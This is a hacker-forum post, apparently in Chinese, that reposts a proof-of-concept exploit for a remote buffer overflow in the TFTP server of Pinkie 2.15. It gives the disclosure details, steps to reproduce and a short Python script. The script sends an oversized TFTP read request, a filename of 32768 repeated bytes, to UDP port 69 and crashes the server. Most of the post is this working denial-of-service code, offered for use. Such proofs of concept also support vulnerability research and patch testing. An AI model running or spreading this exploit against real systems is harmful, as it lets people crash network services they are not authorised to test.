跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)

精选回复

发布于
# Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-19
# Vendor Homepage: http://www.ipuptime.net/
# Software Link : http://ipuptime.net/PinkieSetup.zip
# Tested Version: 2.15
# Vulnerability Type:  Buffer Overflow (DoS) Remote
# Tested on OS: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: Pinkie 2.15 TFTP Remote Buffer Overflow

# Steps to reproduce:
# 1. - Download and install Pinkie 2.15
# 2. - Start TFTP Server listening on port 69
# 3. - Run the Script from remote PC/IP
# 4. - Crashed


#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

read = (
    #Request - read
    b'\x00\x01'  #Static - opcode
    + b')' * 32768 +  #String - source_file (mutant, size=32768, orig val: b'File.bin')
    b'\x00'  #Delim - delim1
    b'netascii'  #String - transfer_mode
    b'\x00'  #Delim - delim2
)
sock.sendto(read, ('192.168.1.207', 69))
sock.recv(65535)

sock.close()
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。